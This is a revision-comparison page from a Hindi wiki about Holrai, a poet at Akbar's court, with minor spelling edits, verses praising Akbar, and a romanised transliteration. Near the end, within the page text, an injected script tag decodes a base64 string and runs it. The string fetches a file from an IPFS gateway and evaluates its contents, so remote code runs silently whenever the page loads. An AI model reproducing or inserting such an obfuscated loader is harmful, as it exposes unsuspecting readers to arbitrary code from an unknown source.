Difference between revisions of "होलराय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:भक्ति काल (को हटा दिया गया हैं।))
m (Text replace - "मुगल" to "मुग़ल")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 
*होलराय ब्रह्मभट्ट [[अकबर]] के समय में हरिवंश राय के आश्रित थे और कभी कभी शाही दरबार में भी जाया करते थे।  
 
*होलराय ब्रह्मभट्ट [[अकबर]] के समय में हरिवंश राय के आश्रित थे और कभी कभी शाही दरबार में भी जाया करते थे।  
*होलराय ने अकबर से कुछ जमीन पाई थी जिसमें होलपुर गाँव बसाया था।  
+
*होलराय ने अकबर से कुछ ज़मीन पाई थी जिसमें होलपुर गाँव बसाया था।  
 
*कहा जाता हैं कि [[गोस्वामी तुलसीदास]] जी ने इन्हें अपना लोटा दिया था जिस पर इन्होंने कहा था -  
 
*कहा जाता हैं कि [[गोस्वामी तुलसीदास]] जी ने इन्हें अपना लोटा दिया था जिस पर इन्होंने कहा था -  
 
<br />
 
<br />
Line 12: Line 12:
 
*सम्भवत: होलराय केवल राजाओं और रईसों की विरुदावली वर्णन किया करते थे जिसमें जनता के लिए ऐसा कोई विशेष आकर्षण नहीं था कि इनकी रचना सुरक्षित रहती।  
 
*सम्भवत: होलराय केवल राजाओं और रईसों की विरुदावली वर्णन किया करते थे जिसमें जनता के लिए ऐसा कोई विशेष आकर्षण नहीं था कि इनकी रचना सुरक्षित रहती।  
 
*अकबर बादशाह की प्रशंसा में इन्होंने यह कवित्त लिखा है -  
 
*अकबर बादशाह की प्रशंसा में इन्होंने यह कवित्त लिखा है -  
<poem>दिल्ली तें न तख्त ह्वैहै, बख्त ना मुगल कैसो,  
+
<poem>दिल्ली तें न तख्त ह्वैहै, बख्त ना मुग़ल कैसो,  
 
ह्वैहै ना नगर बढ़ि आगरा नगर तें।
 
ह्वैहै ना नगर बढ़ि आगरा नगर तें।
 
गंग तें न गुनी, तानसेन तें न तानबाज,
 
गंग तें न गुनी, तानसेन तें न तानबाज,
Line 32: Line 32:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{मुग़ल साम्राज्य}}
 
{{मुग़ल साम्राज्य}}
 +
{{भारत के कवि}}
 
[[Category:मुग़ल_साम्राज्य]]
 
[[Category:मुग़ल_साम्राज्य]]
 
[[Category:इतिहास_कोश]]
 
[[Category:इतिहास_कोश]]

Latest revision as of 09:07, 11 July 2011

  • holaray brahmabhatt akabar ke samay mean harivansh ray ke ashrit the aur kabhi kabhi shahi darabar mean bhi jaya karate the.
  • holaray ne akabar se kuchh zamin paee thi jisamean holapur gaanv basaya tha.
  • kaha jata haian ki gosvami tulasidas ji ne inhean apana lota diya tha jis par inhoanne kaha tha -


lota tulasidas ko lakh taka ko mol.

  • gosvami ji ne turant uttar diya,


mol tol kachhu hai nahian, lehu ray kavi hol.

  • is ghatana se inaki pusht hoti thi.
  • sambhavat: holaray keval rajaoan aur reesoan ki virudavali varnan kiya karate the jisamean janata ke lie aisa koee vishesh akarshan nahian tha ki inaki rachana surakshit rahati.
  • akabar badashah ki prashansa mean inhoanne yah kavitt likha hai -

dilli tean n takht hvaihai, bakht na mugal kaiso,
hvaihai na nagar badhi agara nagar tean.
gang tean n guni, tanasen tean n tanabaj,
man tean n raja au n data birabaratean
khan khanakhana tean n, nar narahari tean n,
hvaihai na divan kooo bedar tudar tean.
navau khand sat dip; sat hoo samudr par,
hvaihai na jalaludin sah akabar tean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh